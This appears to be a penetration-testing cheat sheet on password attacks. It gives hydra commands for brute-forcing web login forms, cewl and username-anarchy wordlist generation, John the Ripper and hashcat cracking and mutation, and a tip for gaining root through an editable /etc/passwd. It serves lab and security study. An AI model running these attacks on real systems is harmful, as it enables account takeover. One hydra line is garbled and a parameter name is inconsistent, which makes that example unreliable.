# Password Attacks

## Username Custom Wordlist

Username list can be made with username-anarchy

{% code overflow="wrap" %}

```
ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first
```

{% endcode %}

## Bruteforcing WebApps

When a website needs to be bruteforced with login use cewl to make a wordlist:

```
cewl http://postfish.off/team.html -m 5 -w team.txt 
```

Then use it with hydra

Normal:

{% code overflow="wrap" %}

```
hydra -l user -P /usr/share/wordlists/rockyou.txt <o[> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```

{% endcode %}

Here `Login failed. Invalid` is the string it greps for to know the login is not successful.

`fm_user` is the parameter

Base64:

{% code overflow="wrap" %}

```
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^
```

{% endcode %}

## JohnTheRipper

To crack a hash:

{% code title="--wordlist to specify wordlist" %}

```bash
john --format=sha256 hashes_to_crack.txt
```

{% endcode %}

| **Tool**                | **Description**                               |
| ----------------------- | --------------------------------------------- |
| `pdf2john`              | Converts PDF documents for John               |
| `ssh2john`              | Converts SSH private keys for John            |
| `mscash2john`           | Converts MS Cash hashes for John              |
| `keychain2john`         | Converts OS X keychain files for John         |
| `rar2john`              | Converts RAR archives for John                |
| `pfx2john`              | Converts PKCS#12 files for John               |
| `truecrypt_volume2john` | Converts TrueCrypt volumes for John           |
| `keepass2john`          | Converts KeePass databases for John           |
| `vncpcap2john`          | Converts VNC PCAP files for John              |
| `putty2john`            | Converts PuTTY private keys for John          |
| `zip2john`              | Converts ZIP archives for John                |
| `hccap2john`            | Converts WPA/WPA2 handshake captures for John |
| `office2john`           | Converts MS Office documents for John         |
| `wpa2john`              | Converts WPA/WPA2 handshakes for John         |

To mutate the password:

```bash
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
```

If /etc/passwd file is editable then delete the "x" in it

**Algorithm Types**

* `$1$` – MD5
* `$2a$` – Blowfish
* `$2y$` – Eksblowfish
* `$5$` – SHA-256
* `$6$` – SHA-512

\\